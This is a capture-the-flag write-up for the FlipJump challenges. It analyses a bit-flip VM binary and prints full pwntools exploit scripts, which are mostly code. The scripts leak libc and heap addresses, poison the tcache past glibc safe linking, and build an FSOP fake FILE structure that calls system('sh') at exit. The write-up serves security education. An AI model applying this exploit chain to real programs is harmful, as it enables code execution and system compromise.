1. Overview
I participated in this CTF as a PLUS, 10th.
Among them, I solved FlipJump1, FlipJump1.5, and FlipJump2 and plan to write a writeup for them.
2. FlipJump1 (29 solved), FlipJump 1.5(11 solved)
Actually, IDK what is unintended solution.
So, I'll explain about FilpJump1.5 solution.
2.1. Analysis Program
First, Start From main
int __cdecl main(int argc, const char **argv, const char **envp)
char v4; // [rsp+7h] [rbp-39h]
__int64 v5; // [rsp+8h] [rbp-38h] BYREF
void *s; // [rsp+10h] [rbp-30h]
void *v7; // [rsp+18h] [rbp-28h]
__int64 v8; // [rsp+20h] [rbp-20h]
uint64_t v9; // [rsp+28h] [rbp-18h]
char buf[2]; // [rsp+36h] [rbp-Ah] BYREF
unsigned __int64 v11; // [rsp+38h] [rbp-8h]
v11 = __readfsqword(0x28u);
setup(argc, argv, envp);
puts("Let's play a 2-player bit flip game using a bit flip VM.");
s = malloc(2uLL);
v7 = malloc(2uLL);
memset(s, 0, 2uLL);
memset(v7, 0, 2uLL);
while ( 1 )
v5 = randomize_board(s);
*(_WORD *)v7 = *(_WORD *)s;
v8 = run_player((manage *)&p1_code, (__int64)s, (uint64_t *)&v5);
v4 = (*((char *)v7 + v8 / 8) >> (v8 & 7)) & 1;
*((_BYTE *)v7 + v8 / 8) ^= 1 << (v8 & 7);
v9 = run_player((manage *)&p2_code, (__int64)v7, 0LL);
printf("Flip[%ld] Bit %ld %c->%c\n", v8 / 8, v8 % 8, (unsigned int)(v4 + 48), (unsigned int)((v4 ^ 1) + 48));
if ( v9 != v5 )
if ( ++win_count == 69 )
puts("Play again? (Y/N)");
read(0, buf, 2uLL);
if ( buf[0] != 89 )
free(*(void **)p1_code);
free(*(void **)p2_code);
p1_code = 0LL;
p2_code = 0LL;
return 0;
We are especially interested in randomize_board
, run_player
because our main purpose is v9 != v5
is simple. make random table(2bytes) and return [0, 15]
__int64 __fastcall randomize_board(void *a1)
__int64 v2[2]; // [rsp+10h] [rbp-10h] BYREF
v2[1] = __readfsqword(0x28u);
// make 2bytes random table
read(urandom_fd, a1, 2uLL);
v2[0] = 0LL;
read(urandom_fd, v2, 4uLL);
// return [0, 15] random value
return v2[0] % 16;
is more complex.
In here, I define two local_types, manage
and code_manage
is wrapper ofcode_manage
is main container and executer of code.
struct manage {
struct code_manage *code_manage;
void *idk2;
void *idk3;
struct code_manage {
uint64_t *code;
int64_t length;
int32_t pc;
Then, we can rewrite run_player
as below
uint64_t __fastcall run_player(manage *a1, __int64 a2, uint64_t *a3)
struct code_manage *code_manage; // rbx
int j; // [rsp+20h] [rbp-20h]
int v7; // [rsp+24h] [rbp-1Ch]
int64_t i; // [rsp+28h] [rbp-18h]
a1->code_manage = (struct code_manage *)malloc(0x18uLL);
puts("Enter code length:");
read(0, &a1->code_manage->length, 8uLL);
code_manage = a1->code_manage;
code_manage->code = (uint64_t *)malloc(a1->code_manage->length);
if ( !a1->code_manage->code )
memset(a1->code_manage->code, 0, a1->code_manage->length);
puts("Enter code:");
for ( i = 0LL; i < a1->code_manage->length; i += v7 )
v7 = read(0, (char *)a1->code_manage->code + i, a1->code_manage->length - i);
if ( v7 < 0 )
a1->code_manage->pc = 0;
for ( j = 0; j <= 15; ++j )
a1->code_manage->code[2 * j - 31 + a1->code_manage->length / 8] = ((*(char *)(j / 8 + a2) >> (j & 7)) & 1) != 0;
if ( a3 )
a1->code_manage->code[a1->code_manage->length / 8 - 33] = *a3;
return a1->code_manage->code[a1->code_manage->length / 8 - 33];
Now, we can understand purpose of run_player
- Get
- Get
- Set
's pc to0
- Initialize
secion by usingrand_table
generated fromrandomize_board
- Run
using ourcode
- Return result
One problem is, return value a1->code_manage->code[a1->code_manage->length / 8 - 33]
is initilize to rand_value
but we can't know.
- Doing some malicious action in
, we need to break this
int64_t __fastcall run_vm(code_manage *a1)
int64_t result; // rax
__int64 _victim; // rax
int64_t victim; // [rsp+10h] [rbp-10h]
__int64 next_pc; // [rsp+18h] [rbp-8h]
while ( 1 )
victim = a1->code[2 * a1->pc];
next_pc = a1->code[2 * a1->pc + 1];
result = 8 * a1->length;
if ( victim >= result )
if ( victim < 0 || victim > 8 * a1->length )
_victim = a1->code[2 * a1->pc];
*((_BYTE *)a1->code + (_victim >> 3)) ^= 1 << (victim & 7);
if ( next_pc < 0 || 2 * next_pc + 1 >= a1->length )
a1->pc = next_pc;
return result;
Let's understand run_vm
- Get
value, It define filped address. 63 4 3 0 [ ptr | bit ]
- Get
value. - Run checker3.2. if
< 0 orvictim
then exit - 3.1. if
then break - Flip
's bit - check
is positive andnext_pc
(important! it use signed op) - set pc <- next_pc and loop
It's weird, isn't it?
For example, let pc
is 0x7fffffffffffffff
*2 + 1 ) <0
(because of signed op)
Therefore, We can access priv heap information.
Also, there exist two run_player
and first run_player
wrote rand_value
So, we can assume like
| -> first run_player section
| `rand_value`
code[0] | code[1]
| -> second run_player section
then let't use rand_value
as pc
, we can occur it by oob access primitive.
| -> first run_player section
| `rand_value`
0 | offset_of_rand
| -> second run_player section
then pc
changes 0
-> offset_of_rand_value
-> rand_value
But, Is it useful?
Sure! Show below payload
def jmp_table(victim, shift, next_pc):
assert (0 <= shift <= 7)
return p64(victim*8 + shift) + p64(next_pc)
p.sendafter(":\n", p64(0x200))
p.sendafter(":\n", jmp_table(0x400, 0, 0)*(0x200//0x10))
rand_ptr = 0x3f8
payload = b""
payload += jmp_table(0x7, 0x0, ((0x10000000000000000 - (0x140//8))//0x2)) # pc = 0 * 8
payload += jmp_table(rand_ptr, 0, 16) # pc = 1 * 8
payload += jmp_table(rand_ptr, 1, 16) # pc = 2 * 8
payload += jmp_table(rand_ptr, 1, 1) # pc = 3 * 8
payload += jmp_table(rand_ptr, 2, 16) # pc = 4 * 8
payload += jmp_table(rand_ptr, 2, 1) # pc = 5 * 8
payload += jmp_table(rand_ptr, 2, 2) # pc = 6 * 8
payload += jmp_table(rand_ptr, 2, 3) # pc = 7 * 8
payload += jmp_table(rand_ptr, 3, 16) # pc = 8 * 8
payload += jmp_table(rand_ptr, 3, 1) # pc = 9 * 8
payload += jmp_table(rand_ptr, 3, 2) # pc = 10 * 8
payload += jmp_table(rand_ptr, 3, 3) # pc = 11 * 8
payload += jmp_table(rand_ptr, 3, 4) # pc = 12 * 8
payload += jmp_table(rand_ptr, 3, 5) # pc = 13 * 8
payload += jmp_table(rand_ptr, 3, 6) # pc = 14 * 8
payload += jmp_table(rand_ptr, 3, 7) # pc = 15 * 8
payload += jmp_table(0x1000, 0x0, 0x0)
payload += b"\x00"*(0x500 - len(payload))
p.sendafter(":\n", p64(0x500))
p.sendafter(":\n", payload)
by following pc
, make second run_player
chunk's return value.
For example, if rand_value
is 0b1010
second run_player return value offset = 0x3f8
curr_pc = 0, victim = code[0x7], next_pc = first run_player rand_value offset, code[0x3f8] = 0b0000
curr_pc = first run_player rand_value offset, victim = code[?], next_pc = 0b1010, code[0x3f8] = 0b0000
curr_pc = 0b1010, victim = code[0x3f8] third bit, next_pc = 0b0010, code[0x3f8] = 0b0000
curr_pc = 0b0010, victim = code[0x3f8] first bit, next_pc = 0b10000, code[0x3f8] = 0b1000
curr_pc = 0b10000, victim = 0x1000, next_pc = 0b0000, code[0x3f8] = 0b1010 -> break while
so, code[0x3f8]
contain rand_value
2.2. Payload
from pwn import *
context.terminal = ["tmux", "new-window"]
context.log_level = "debug"
def jmp_table(victim, shift, next_pc):
assert (0 <= shift <= 7)
return p64(victim*8 + shift) + p64(next_pc)
p = remote("flipjump2.chal.perfect.blue", "1337")
for i in range(70):
p.sendafter(":\n", p64(0x200))
p.sendafter(":\n", jmp_table(0x400, 0, 0)*(0x200//0x10))
rand_ptr = 0x3f8
payload = b""
payload += jmp_table(0x7, 0x0, ((0x10000000000000000 - (0x140//8))//0x2)) # pc = 0 * 8
payload += jmp_table(rand_ptr, 0, 16) # pc = 1 * 8
payload += jmp_table(rand_ptr, 1, 16) # pc = 2 * 8
payload += jmp_table(rand_ptr, 1, 1) # pc = 3 * 8
payload += jmp_table(rand_ptr, 2, 16) # pc = 4 * 8
payload += jmp_table(rand_ptr, 2, 1) # pc = 5 * 8
payload += jmp_table(rand_ptr, 2, 2) # pc = 6 * 8
payload += jmp_table(rand_ptr, 2, 3) # pc = 7 * 8
payload += jmp_table(rand_ptr, 3, 16) # pc = 8 * 8
payload += jmp_table(rand_ptr, 3, 1) # pc = 9 * 8
payload += jmp_table(rand_ptr, 3, 2) # pc = 10 * 8
payload += jmp_table(rand_ptr, 3, 3) # pc = 11 * 8
payload += jmp_table(rand_ptr, 3, 4) # pc = 12 * 8
payload += jmp_table(rand_ptr, 3, 5) # pc = 13 * 8
payload += jmp_table(rand_ptr, 3, 6) # pc = 14 * 8
payload += jmp_table(rand_ptr, 3, 7) # pc = 15 * 8
payload += jmp_table(0x1000, 0x0, 0x0)
payload += b"\x00"*(0x500 - len(payload))
p.sendafter(":\n", p64(0x500))
p.sendafter(":\n", payload)
p.sendlineafter("(Y/N)", "Y")
FlipJump1: pbctf{y0u_wen7_h4m_peko_0fea137b}
FlipJump1.5: pbctf{you_went_ham_peko_81d5f1b3}
3. FlipJump2 (1 solved)
3.1. Analysis
Analysis is already finished.
3.2. Stable Bypass
We can't use same payload. For using main
's print
function, We overwrite first run_player
's return value. However, if we overwrite it, we don't have any information for second run_player
's rand_value
. So we need to write rand_value
There exist easy way. At first run_player
, wrote rand_value
other place and overwrite return value after that.
Next, return value already wroten rand_value
so we need two more process
- return_value ^=
- return value ^=
Finally, We can bypass checker and read arbitrary address near heap by doing
def byte_generator(val, length):
rand_ptr = 0x3e8 - (0x500 - length)
payload = b""
payload += jmp_table(0x0, 0x5, (rand_ptr + 0x10)//0x10) # pc = 0 * 8
payload += jmp_table(rand_ptr, 0, 16) # pc = 1 * 8
payload += jmp_table(rand_ptr, 1, 16) # pc = 2 * 8
payload += jmp_table(rand_ptr, 1, 1) # pc = 3 * 8
payload += jmp_table(rand_ptr, 2, 16) # pc = 4 * 8
payload += jmp_table(rand_ptr, 2, 1) # pc = 5 * 8
payload += jmp_table(rand_ptr, 2, 2) # pc = 6 * 8
payload += jmp_table(rand_ptr, 2, 3) # pc = 7 * 8
payload += jmp_table(rand_ptr, 3, 16) # pc = 8 * 8
payload += jmp_table(rand_ptr, 3, 1) # pc = 9 * 8
payload += jmp_table(rand_ptr, 3, 2) # pc = 10 * 8
payload += jmp_table(rand_ptr, 3, 3) # pc = 11 * 8
payload += jmp_table(rand_ptr, 3, 4) # pc = 12 * 8
payload += jmp_table(rand_ptr, 3, 5) # pc = 13 * 8
payload += jmp_table(rand_ptr, 3, 6) # pc = 14 * 8
payload += jmp_table(rand_ptr, 3, 7) # pc = 15 * 8
rand_ptr = 0x3f8 - (0x500 - length)
payload += jmp_table(rand_ptr, 0x4, (rand_ptr)//0x10) # pc = 16 * 8
payload += jmp_table(rand_ptr, 0, 33) # pc = 17 * 8
payload += jmp_table(rand_ptr, 1, 33) # pc = 18 * 8
payload += jmp_table(rand_ptr, 1, 17) # pc = 19 * 8
payload += jmp_table(rand_ptr, 2, 33) # pc = 20 * 8
payload += jmp_table(rand_ptr, 2, 17) # pc = 21 * 8
payload += jmp_table(rand_ptr, 2, 18) # pc = 22 * 8
payload += jmp_table(rand_ptr, 2, 19) # pc = 23 * 8
payload += jmp_table(rand_ptr, 3, 33) # pc = 24 * 8
payload += jmp_table(rand_ptr, 3, 17) # pc = 25 * 8
payload += jmp_table(rand_ptr, 3, 18) # pc = 26 * 8
payload += jmp_table(rand_ptr, 3, 19) # pc = 27 * 8
payload += jmp_table(rand_ptr, 3, 20) # pc = 28 * 8
payload += jmp_table(rand_ptr, 3, 21) # pc = 29 * 8
payload += jmp_table(rand_ptr, 3, 22) # pc = 30 * 8
payload += jmp_table(rand_ptr, 3, 23) # pc = 31 * 8
payload += jmp_table(0x0, 0x5, 16)
payload += jmp_table(rand_ptr, 0x4, 34)
pc = 34
bit = 0
while (val >> bit) != 0:
if (val >> bit) & 0x1:
pc += 1
payload += jmp_table((rand_ptr + (bit//8)), bit%8, pc)
bit += 1
payload += jmp_table(0x1000, 0, pc+1)
assert(len(payload) <= length)
payload += b"\x00"*(length - len(payload))
return payload
def bypass_generator(length, temp = True):
if length != 0x500:
rand_ptr = length - 33*8
rand_ptr = 0x3f8
payload = b""
if length != 0x500 and temp:
payload += jmp_table(0x7, 0x0, ((0x10000000000000000 - (0x150//8))//0x2)) # pc = 0 * 8
payload += jmp_table(0x7, 0x0, ((0x10000000000000000 - (0x130//8))//0x2))
payload += jmp_table(rand_ptr, 0, 16) # pc = 1 * 8
payload += jmp_table(rand_ptr, 1, 16) # pc = 2 * 8
payload += jmp_table(rand_ptr, 1, 1) # pc = 3 * 8
payload += jmp_table(rand_ptr, 2, 16) # pc = 4 * 8
payload += jmp_table(rand_ptr, 2, 1) # pc = 5 * 8
payload += jmp_table(rand_ptr, 2, 2) # pc = 6 * 8
payload += jmp_table(rand_ptr, 2, 3) # pc = 7 * 8
payload += jmp_table(rand_ptr, 3, 16) # pc = 8 * 8
payload += jmp_table(rand_ptr, 3, 1) # pc = 9 * 8
payload += jmp_table(rand_ptr, 3, 2) # pc = 10 * 8
payload += jmp_table(rand_ptr, 3, 3) # pc = 11 * 8
payload += jmp_table(rand_ptr, 3, 4) # pc = 12 * 8
payload += jmp_table(rand_ptr, 3, 5) # pc = 13 * 8
payload += jmp_table(rand_ptr, 3, 6) # pc = 14 * 8
payload += jmp_table(rand_ptr, 3, 7) # pc = 15 * 8
payload += jmp_table(0x1000, 0x0, 0x0)
assert(len(payload) <= length)
payload += b"\x00"*(length - len(payload))
return payload
p.sendafter(":\\n", p64(0x410))
p.sendafter(":\\n", byte\_generator( 0x0 , 0x410))
p.sendafter(":\\n", p64(0x400))
p.sendafter(":\\n", bypass\_generator(0x400))
p.sendlineafter("(Y/N)", "Y")
One causion, There exist factitious code like temp = True
or length != 0x500
. It just for offset(Insufficient Heap Feng Shui Skills)...
3.3. Leak Heap and Libc address
Now, We can read (almost) arbitrary heap address.
v8 = run_player((manage *)&p1_code, (__int64)s, (uint64_t *)&v5);
v4 = (*((char *)v7 + v8 / 8) >> (v8 & 7)) & 1;
*((_BYTE *)v7 + v8 / 8) ^= 1 << (v8 & 7);
v9 = run_player((manage *)&p2_code, (__int64)v7, 0LL);
printf("Flip[%ld] Bit %ld %c->%c\n", v8 / 8, v8 % 8, (unsigned int)(v4 + 48), (unsigned int)((v4 ^ 1) + 48));
We can control v8
And by using heap feng shui, we can write libc and heap address using large bin
So, we can read bit by bit! (but bit will flipped so never use that large bin again!)
3.4. Generate Weird Tcache Chunk
Next problem is, We can't overlap tcache normally. It always free chunk every loop.
But we already know powerful code. At 3.3.
, it flip any address only one bit.
So we can consider below situation(chunk size is just example)
- allocate
chunk (firstrun_player
) - allocate
chunk (firstrun_player
) - allocate
chunk (secondrun_player
) - allocate
chunk (secondrun_player
) - flip first
) - at heap size, (0x650
) - free all chunk
Now, We made 0x240
and this chunk will not malloc before we allocate again!
It means, We have enough time for overwrite chunk bit by bit!
p.sendafter(":\n", p64(0x640))
p.sendafter(":\n", byte_generator( 0x889*8 + 0x2 , 0x640))
p.sendafter(":\n", p64(0x640))
p.sendafter(":\n", bypass_generator(0x640, False))
p.sendlineafter("(Y/N)", "Y")
p.sendafter(":\n", p64(0x640))
p.sendafter(":\n", byte_generator( (0x889+0x650)*8 + 0x2 , 0x640))
p.sendafter(":\n", p64(0x640))
p.sendafter(":\n", bypass_generator(0x640, False))
p.sendlineafter("(Y/N)", "Y")
For tcache count value, generate two 0x240
freed tcache chunk.
3.5. Tcache Fd Overwrite
In glibc 2.35, there exist safe linking((base_ptr >> 12) ^ fd
Use same technique at 3.4.
, overwrite 0x240
's fd
Let's define value to overwrite
------- tcache_pthread ---------------------------
| | |
| first_freed | |
first_freed | ((first_freed >> 12) ^ second_freed) | |
we'll change first_freed
's fd
to ((first_freed >> 12) ^ ATTACK)
so loop
- compare ((first_freed >> 12) ^ second_freed) and ((first_freed >> 12) ^ ATTACK) k's bit
- if same, stay
- if diff, flip using
Then, we get tcache_ptherad(0x250 chunk) -> first_freed -> ATTACK pointing
It means, we can wrote anywhere!
3.6. Threat of Exit's _IO_cleanup
We have two run_player
stage so at second run_player
, wrote max 0x248
length value.
But, There arn't appropriate one_gadget and only one chance to overwrite.(We can overwrite Libc twice but prob is 1/16
And, we can't overwrite _IO_2_1_stdout_
or libc.got.plt
because it occur sigsegv
because of memset(a1->code_manage->code, 0, a1->code_manage->length);
Fortunaly, at exit
, it call _IO_cleanup
. It recursively cleanup all _IO_*
(stdin, stdout, stderr, ...).
Let's see detail.
_IO_cleanup (void)
int result = _IO_flush_all_lockp (0);
_IO_unbuffer_all ();
return result;
call _IO_flush_all_lockp
_IO_flush_all_lockp (int do_lock)
for (fp = (FILE *) _IO_list_all; fp != NULL; fp = fp->_chain)
[ ... ]
if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
|| (_IO_vtable_offset (fp) == 0
&& fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
> fp->_wide_data->_IO_write_base))
&& _IO_OVERFLOW (fp, EOF) == EOF)
If it satisfy some condition, _IO_OVERFLOW
is called.
If we modify vtable
to libc_base + libc.symbols['_IO_wfile_jumps']
, it direct to _IO_wfile_overflow
_IO_wfile_overflow (FILE *f, wint_t wch)
if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
f->_flags |= _IO_ERR_SEEN;
__set_errno (EBADF);
return WEOF;
/* If currently reading or no buffer allocated. */
if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0)
/* Allocate a buffer if needed. */
if (f->_wide_data->_IO_write_base == 0)
_IO_wdoallocbuf (f);
_IO_wdoallocbuf (FILE *fp)
if (fp->_wide_data->_IO_buf_base)
if (!(fp->_flags & _IO_UNBUFFERED))
if ((wint_t)_IO_WDOALLOCATE (fp) != WEOF)
_IO_wsetb (fp, fp->_wide_data->_shortbuf,
fp->_wide_data->_shortbuf + 1, 0);
After satisfy som conditions, It call _IO_wdoallocbuf
doesn't have vtable address validate
so call any function.
So, we can make FSOP
chunk like this
def FSOP_struct(flags = 0, _IO_read_ptr = 0, _IO_read_end = 0, _IO_read_base = 0,\
_IO_write_base = 0, _IO_write_ptr = 0, _IO_write_end = 0, _IO_buf_base = 0, _IO_buf_end = 0,\
_IO_save_base = 0, _IO_backup_base = 0, _IO_save_end = 0, _markers= 0, _chain = 0, _fileno = 0,\
_flags2 = 0, _old_offset = 0, _cur_column = 0, _vtable_offset = 0, _shortbuf = 0, lock = 0,\
_offset = 0, _codecvt = 0, _wide_data = 0, _freeres_list = 0, _freeres_buf = 0,\
__pad5 = 0, _mode = 0, _unused2 = b"", vtable = 0, more_append = b""):
FSOP = p64(flags) + p64(_IO_read_ptr) + p64(_IO_read_end) + p64(_IO_read_base)
FSOP += p64(_IO_write_base) + p64(_IO_write_ptr) + p64(_IO_write_end)
FSOP += p64(_IO_buf_base) + p64(_IO_buf_end) + p64(_IO_save_base) + p64(_IO_backup_base) + p64(_IO_save_end)
FSOP += p64(_markers) + p64(_chain) + p32(_fileno) + p32(_flags2)
FSOP += p64(_old_offset) + p16(_cur_column) + p8(_vtable_offset) + p8(_shortbuf) + p32(0x0)
FSOP += p64(lock) + p64(_offset) + p64(_codecvt) + p64(_wide_data) + p64(_freeres_list) + p64(_freeres_buf)
FSOP += p64(__pad5) + p32(_mode)
if _unused2 == b"":
FSOP += b"\x00"*0x14
FSOP += _unused2[0x0:0x14].rjust(0x14, b"\x00")
FSOP += p64(vtable)
FSOP += more_append
return FSOP
FSOP = FSOP_struct(flags = u64(b"\x01\x01\x01\x01;sh;"), \
_IO_write_ptr = 0x10, \
lock = heap_base + 0x9000 + 0x100, \
_wide_data = libc_base + libc.symbols['_IO_2_1_stdin_'], \
_offset = heap_base + 0x9000, \
_IO_buf_base = 0x1, \
_chain = 0x0, \
_markers = libc_base + libc.symbols['system'], \
_mode = 0xffffffff, \
vtable = libc_base + libc.symbols['_IO_wfile_jumps'], \
more_append = p64(libc_base + libc.symbols['_IO_2_1_stdin_'] - 0x8)
3.7. Payload
There is some useless code, please forgive me :(
from pwn import *
context.terminal = ["tmux", "new-window"]
# context.log_level = "debug"
def FSOP_struct(flags = 0, _IO_read_ptr = 0, _IO_read_end = 0, _IO_read_base = 0,\
_IO_write_base = 0, _IO_write_ptr = 0, _IO_write_end = 0, _IO_buf_base = 0, _IO_buf_end = 0,\
_IO_save_base = 0, _IO_backup_base = 0, _IO_save_end = 0, _markers= 0, _chain = 0, _fileno = 0,\
_flags2 = 0, _old_offset = 0, _cur_column = 0, _vtable_offset = 0, _shortbuf = 0, lock = 0,\
_offset = 0, _codecvt = 0, _wide_data = 0, _freeres_list = 0, _freeres_buf = 0,\
__pad5 = 0, _mode = 0, _unused2 = b"", vtable = 0, more_append = b""):
FSOP = p64(flags) + p64(_IO_read_ptr) + p64(_IO_read_end) + p64(_IO_read_base)
FSOP += p64(_IO_write_base) + p64(_IO_write_ptr) + p64(_IO_write_end)
FSOP += p64(_IO_buf_base) + p64(_IO_buf_end) + p64(_IO_save_base) + p64(_IO_backup_base) + p64(_IO_save_end)
FSOP += p64(_markers) + p64(_chain) + p32(_fileno) + p32(_flags2)
FSOP += p64(_old_offset) + p16(_cur_column) + p8(_vtable_offset) + p8(_shortbuf) + p32(0x0)
FSOP += p64(lock) + p64(_offset) + p64(_codecvt) + p64(_wide_data) + p64(_freeres_list) + p64(_freeres_buf)
FSOP += p64(__pad5) + p32(_mode)
if _unused2 == b"":
FSOP += b"\x00"*0x14
FSOP += _unused2[0x0:0x14].rjust(0x14, b"\x00")
FSOP += p64(vtable)
FSOP += more_append
return FSOP
def jmp_table(victim, shift, next_pc):
assert (0 <= shift <= 7)
return p64(victim*8 + shift) + p64(next_pc)
# p = process("./flipjump_fixed")
p = remote("flipjump2.chal.perfect.blue", "1337")
libc = ELF("./libc.so.6")
def decrypt(cipher):
key = 0
plain = 0
for i in range(1, 6):
bits = 64-12*i
if bits < 0:
bits = 0
plain = ((cipher ^ key) >> bits) << bits
key = plain >> 12
return plain
def bypass_generator(length, temp = True):
if length != 0x500:
rand_ptr = length - 33*8
rand_ptr = 0x3f8
payload = b""
if length != 0x500 and temp:
payload += jmp_table(0x7, 0x0, ((0x10000000000000000 - (0x150//8))//0x2)) # pc = 0 * 8
payload += jmp_table(0x7, 0x0, ((0x10000000000000000 - (0x130//8))//0x2))
payload += jmp_table(rand_ptr, 0, 16) # pc = 1 * 8
payload += jmp_table(rand_ptr, 1, 16) # pc = 2 * 8
payload += jmp_table(rand_ptr, 1, 1) # pc = 3 * 8
payload += jmp_table(rand_ptr, 2, 16) # pc = 4 * 8
payload += jmp_table(rand_ptr, 2, 1) # pc = 5 * 8
payload += jmp_table(rand_ptr, 2, 2) # pc = 6 * 8
payload += jmp_table(rand_ptr, 2, 3) # pc = 7 * 8
payload += jmp_table(rand_ptr, 3, 16) # pc = 8 * 8
payload += jmp_table(rand_ptr, 3, 1) # pc = 9 * 8
payload += jmp_table(rand_ptr, 3, 2) # pc = 10 * 8
payload += jmp_table(rand_ptr, 3, 3) # pc = 11 * 8
payload += jmp_table(rand_ptr, 3, 4) # pc = 12 * 8
payload += jmp_table(rand_ptr, 3, 5) # pc = 13 * 8
payload += jmp_table(rand_ptr, 3, 6) # pc = 14 * 8
payload += jmp_table(rand_ptr, 3, 7) # pc = 15 * 8
payload += jmp_table(0x1000, 0x0, 0x0)
assert(len(payload) <= length)
payload += b"\x00"*(length - len(payload))
return payload
def byte_generator(val, length):
rand_ptr = 0x3e8 - (0x500 - length)
payload = b""
payload += jmp_table(0x0, 0x5, (rand_ptr + 0x10)//0x10) # pc = 0 * 8
payload += jmp_table(rand_ptr, 0, 16) # pc = 1 * 8
payload += jmp_table(rand_ptr, 1, 16) # pc = 2 * 8
payload += jmp_table(rand_ptr, 1, 1) # pc = 3 * 8
payload += jmp_table(rand_ptr, 2, 16) # pc = 4 * 8
payload += jmp_table(rand_ptr, 2, 1) # pc = 5 * 8
payload += jmp_table(rand_ptr, 2, 2) # pc = 6 * 8
payload += jmp_table(rand_ptr, 2, 3) # pc = 7 * 8
payload += jmp_table(rand_ptr, 3, 16) # pc = 8 * 8
payload += jmp_table(rand_ptr, 3, 1) # pc = 9 * 8
payload += jmp_table(rand_ptr, 3, 2) # pc = 10 * 8
payload += jmp_table(rand_ptr, 3, 3) # pc = 11 * 8
payload += jmp_table(rand_ptr, 3, 4) # pc = 12 * 8
payload += jmp_table(rand_ptr, 3, 5) # pc = 13 * 8
payload += jmp_table(rand_ptr, 3, 6) # pc = 14 * 8
payload += jmp_table(rand_ptr, 3, 7) # pc = 15 * 8
rand_ptr = 0x3f8 - (0x500 - length)
payload += jmp_table(rand_ptr, 0x4, (rand_ptr)//0x10) # pc = 16 * 8
payload += jmp_table(rand_ptr, 0, 33) # pc = 17 * 8
payload += jmp_table(rand_ptr, 1, 33) # pc = 18 * 8
payload += jmp_table(rand_ptr, 1, 17) # pc = 19 * 8
payload += jmp_table(rand_ptr, 2, 33) # pc = 20 * 8
payload += jmp_table(rand_ptr, 2, 17) # pc = 21 * 8
payload += jmp_table(rand_ptr, 2, 18) # pc = 22 * 8
payload += jmp_table(rand_ptr, 2, 19) # pc = 23 * 8
payload += jmp_table(rand_ptr, 3, 33) # pc = 24 * 8
payload += jmp_table(rand_ptr, 3, 17) # pc = 25 * 8
payload += jmp_table(rand_ptr, 3, 18) # pc = 26 * 8
payload += jmp_table(rand_ptr, 3, 19) # pc = 27 * 8
payload += jmp_table(rand_ptr, 3, 20) # pc = 28 * 8
payload += jmp_table(rand_ptr, 3, 21) # pc = 29 * 8
payload += jmp_table(rand_ptr, 3, 22) # pc = 30 * 8
payload += jmp_table(rand_ptr, 3, 23) # pc = 31 * 8
payload += jmp_table(0x0, 0x5, 16)
payload += jmp_table(rand_ptr, 0x4, 34)
pc = 34
bit = 0
while (val >> bit) != 0:
if (val >> bit) & 0x1:
pc += 1
payload += jmp_table((rand_ptr + (bit//8)), bit%8, pc)
bit += 1
payload += jmp_table(0x1000, 0, pc+1)
assert(len(payload) <= length)
payload += b"\x00"*(length - len(payload))
return payload
p.sendafter(":\n", p64(0x410))
p.sendafter(":\n", byte_generator( 0x0 , 0x410))
p.sendafter(":\n", p64(0x400))
p.sendafter(":\n", bypass_generator(0x400))
p.sendlineafter("(Y/N)", "Y")
for i in range(0x1):
p.sendafter(":\n", p64(0x10000))
p.sendafter(":\n", byte_generator( 0x0, 0x10000 ))
p.sendafter(":\n", p64(0x10000))
p.sendafter(":\n", bypass_generator(0x10000, False))
p.sendlineafter("(Y/N)", "Y")
# leak = 0x0
# i = 0
libc_leak = 0x0
i = 0
while i < 6*8:
p.sendafter(":\n", p64(0x500))
p.sendafter(":\n", byte_generator( ((0x40 + i//8) * 8) + (i%8) , 0x500))
p.sendafter(":\n", p64(0x500))
p.sendafter(":\n", bypass_generator(0x500))
if int(p.recvuntil(b"]")[:-1].decode()) != (0x40 + i//8):
print("Falied, retry it")
p.sendlineafter("(Y/N)", "Y")
p.recvuntil(b"Bit ")
if int(p.recv(1)[0] - ord('0')) != (i%8):
print("Falied, retry it")
p.sendlineafter("(Y/N)", "Y")
libc_leak += (int(p.recvline().split(b"->")[0][-1] - ord('0')) << i)
p.sendlineafter("(Y/N)", "Y")
i += 1
libc_base = libc_leak - 0x21a0d0
heap_leak = 0x0
i = 0
while i < 6*8:
p.sendafter(":\n", p64(0x500))
p.sendafter(":\n", byte_generator( ((0x50 + i//8) * 8) + (i%8) , 0x500))
p.sendafter(":\n", p64(0x500))
p.sendafter(":\n", bypass_generator(0x500))
if int(p.recvuntil(b"]")[:-1].decode()) != (0x50 + i//8):
print("Falied, retry it")
p.sendlineafter("(Y/N)", "Y")
p.recvuntil(b"Bit ")
if int(p.recv(1)[0] - ord('0')) != (i%8):
print("Falied, retry it")
p.sendlineafter("(Y/N)", "Y")
heap_leak += (int(p.recvline().split(b"->")[0][-1] - ord('0')) << i)
p.sendlineafter("(Y/N)", "Y")
i += 1
heap_base = heap_leak - 0x2f0
p.sendafter(":\n", p64(0x640))
p.sendafter(":\n", byte_generator( 0x889*8 + 0x2 , 0x640))
p.sendafter(":\n", p64(0x640))
p.sendafter(":\n", bypass_generator(0x640, False))
p.sendlineafter("(Y/N)", "Y")
p.sendafter(":\n", p64(0x640))
p.sendafter(":\n", byte_generator( (0x889+0x650)*8 + 0x2 , 0x640))
p.sendafter(":\n", p64(0x640))
p.sendafter(":\n", bypass_generator(0x640, False))
p.sendlineafter("(Y/N)", "Y")
p.sendafter(":\n", p64(0x440))
p.sendafter(":\n", byte_generator( (0x889+0x650*2)*8 + 0x2 , 0x440))
p.sendafter(":\n", p64(0x440))
p.sendafter(":\n", bypass_generator(0x440, False))
p.sendlineafter("(Y/N)", "Y")
p.sendafter(":\n", p64(0x440))
p.sendafter(":\n", byte_generator( (0x889+0x650*2+0x450)*8 + 0x2 , 0x440))
p.sendafter(":\n", p64(0x440))
p.sendafter(":\n", bypass_generator(0x440, False))
p.sendlineafter("(Y/N)", "Y")
base_ptr = heap_base + 0x11a0
target_ptr = libc_base + libc.symbols['_IO_2_1_stdin_'] - 0x10
current_ptr = heap_base + 0xb50
current_value = ((base_ptr >> 12) ^ current_ptr)
target_value = ((base_ptr >> 12) ^ target_ptr)
i = 0
while i < 6*8:
if (target_value >> i) & 1 == (current_value >> i) & 1:
i += 1
p.sendafter(":\n", p64(0x500))
p.sendafter(":\n", byte_generator( ((0xee0 + i//8) * 8) + (i%8) , 0x500))
p.sendafter(":\n", p64(0x500))
p.sendafter(":\n", bypass_generator(0x500))
